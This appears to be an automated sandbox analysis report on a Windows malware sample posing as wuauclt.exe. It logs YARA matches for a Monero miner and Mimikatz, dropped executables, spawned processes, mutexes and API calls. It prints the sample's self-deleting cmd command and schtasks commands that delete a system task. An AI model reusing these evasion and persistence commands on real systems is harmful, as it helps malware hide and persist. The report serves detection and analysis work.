      Source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 23.2.dllhost.exe.2897468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.10.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000010.00000000.695613920.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000010.00000000.696093152.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000000.696628096.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000010.00000000.695093675.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000010.00000000.696044384.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000002.00000002.968926651.000000000309D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000000.695147785.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000010.00000000.696614695.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000002.00000002.968774833.0000000003012000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: Process Memory Space: svchost.exe PID: 5008, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: Process Memory Space: svchost.exe PID: 5008, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: Process Memory Space: dllhostex.exe PID: 7088, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: Process Memory Space: dllhostex.exe PID: 7088, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: C:\Windows\SysWOW64\WUDHostServices.exe, type: DROPPEDMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPEDMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPEDMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: C:\Users\user\Desktop\wuauclt.exe, File deleted: C:\Windows\SysWOW64\text.log
      Source: C:\Users\user\Desktop\wuauclt.exe, File created: C:\Windows\SysWOW64\text.log
      Source: C:\Windows\SysWOW64\ctfmon.exe, Code function: String function: 00971640 appears 34 times
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Code function: String function: 02FB1640 appears 34 times
      Source: C:\Windows\SysWOW64\svchost.exe, Code function: String function: 03998D80 appears 44 times
      Source: C:\Windows\SysWOW64\dllhostex.exe, Code function: String function: 01351E90 appears 40 times
      Source: C:\Windows\SysWOW64\dllhost.exe, Code function: String function: 02871640 appears 34 times
      Source: C:\Windows\SysWOW64\dllhost.exe, Code function: String function: 02E11640 appears 34 times
      Source: C:\Windows\SysWOW64\dllhostex.exe, Code function: 16_2_01347F80 NtDeviceIoControlFile,WSASetLastError,WSAGetLastError,16_2_01347F80
      Source: wuauclt.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engine, Classification label: mal100.troj.expl.evad.mine.winEXE@48/9@202/67
      Source: C:\Users\user\Desktop\wuauclt.exe, Code function: RegOpenKeyExA,RegQueryValueExA,SetLastError,RegCloseKey,lstrlenA,lstrlenA,lstrlenA,lstrlenA,RegSetValueExA,RegCloseKey,SetLastError,lstrlenA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,SetLastError,OpenSCManagerA,wsprintfA,wsprintfA,CreateServiceA,wsprintfA,lstrlenA,lstrlenA,lstrcatA,lstrlenA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00256CF0
      Source: C:\Users\user\Desktop\wuauclt.exe, Code function: lstrlenA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,SetLastError,OpenSCManagerA,wsprintfA,wsprintfA,CreateServiceA,wsprintfA,lstrlenA,lstrlenA,lstrcatA,lstrlenA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00256E80
      Source: C:\Users\user\Desktop\wuauclt.exe, Code function: 0_2_00257040 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00257040
      Source: C:\Windows\SysWOW64\ctfmon.exe, Code function: 15_2_00969740 GetSystemDirectoryA,DeleteFileA,DeleteFileA,DeleteFileA,FindResourceA,InitializeCriticalSection,SizeofResource,LoadResource,LockResource,WaitForSingleObject,DeleteFileA,DeleteFileA,15_2_00969740
      Source: wuauclt.exe, Virustotal: Detection: 83%
      Source: wuauclt.exe, Metadefender: Detection: 54%
      Source: wuauclt.exe, ReversingLabs: Detection: 96%
      Source: C:\Users\user\Desktop\wuauclt.exe, File read: C:\Users\user\Desktop\wuauclt.exe
      Source: C:\Users\user\Desktop\wuauclt.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown, Process created: C:\Users\user\Desktop\wuauclt.exe "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Users\user\Desktop\wuauclt.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown, Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\schtasks.exe /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"
      Source: C:\Users\user\Desktop\wuauclt.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\schtasks.exe /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /F
      Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5
      Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\dllhostex.exe C:\Windows\system32\dllhostex.exe
      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\SysWOW64\dllhostex.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\system32\searchprotocolhost.exe
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\system32\dllhost.exe
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\system32\dllhost.exe
      Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exe
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exe
      Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exe
      Source: C:\Users\user\Desktop\wuauclt.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /FJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\dllhostex.exe C:\Windows\system32\dllhostex.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\system32\searchprotocolhost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\system32\dllhost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5 Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exe
      Source: C:\Users\user\Desktop\wuauclt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03991630 Sleep,CreateToolhelp32Snapshot,Process32First,OpenProcess,K32GetModuleFileNameExA,CloseHandle,Process32Next,CloseHandle,2_2_03991630
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{E2088B81F-2A96-43E8-B9F522B}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
      Source: C:\Windows\SysWOW64\dllhostex.exeMutant created: \BaseNamedObjects\{B8A7AE22-7F59-CDE5-71F9C2A}
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6464:120:WilError_01
      Source: C:\Users\user\Desktop\wuauclt.exeMutant created: \Sessions\1\BaseNamedObjects\{ED29R9-8ED1-C760-7D789N}
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4768:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{E2077B81F-2A96-43E8-B9F522B}
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{F5175396-40C2-0218-278D6EE}
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{E2044B81F-2A96-43E8-B9F522B}
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{E2066B81F-2A96-43E8-B9F522B}
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{CE9SCB-B92-FC8-A6FECD}
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6472:120:WilError_01
      Source: dllhostex.exeString found in binary or memory: Previously-added IP address had counter of zero
      Source: dllhostex.exeString found in binary or memory: Failed to find previously-added IP address
      Source: C:\Users\user\Desktop\wuauclt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\dllhostex.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: wuauclt.exeStatic file information: File size 7154917 > 1048576
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: wuauclt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: wuauclt.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: wuauclt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257BA6 push ecx; ret 0_2_00257BB9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD565C6 push ecx; ret 2_2_6FD565D9
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B1B17 push ebx; ret 2_2_039B1B18
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B215E push ecx; ret 2_2_039B2171
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACFED push dword ptr [esp+ecx-75h]; iretd 2_2_039ACFF1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03998DC6 push ecx; ret 2_2_03998DD9
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00989B4D push esi; ret 15_2_00989B56
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00971686 push ecx; ret 15_2_00971699
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0134DB50 push ecx; mov dword ptr [esp], 00000001h16_2_0134DB51
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_0134DBC0 push ecx; mov dword ptr [esp], 00000000h16_2_0134DBC1
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01354606 push ecx; ret 16_2_01354619
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FC9B4D push esi; ret 21_2_02FC9B56
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FB1686 push ecx; ret 21_2_02FB1699
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_0288AB98 pushad ; retf 23_2_0288AB99
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02889B4D push esi; ret 23_2_02889B56
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02871686 push ecx; ret 23_2_02871699
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E2AB98 pushad ; retf 24_2_02E2AB99
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E29B4D push esi; ret 24_2_02E29B56
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E11686 push ecx; ret 24_2_02E11699
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD54D40 VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,2_2_6FD54D40

      Persistence and Installation Behavior

      Source: C:\Windows\SysWOW64\svchost.exeExecutable created and started: C:\Windows\SysWOW64\WUDHostServices.exe
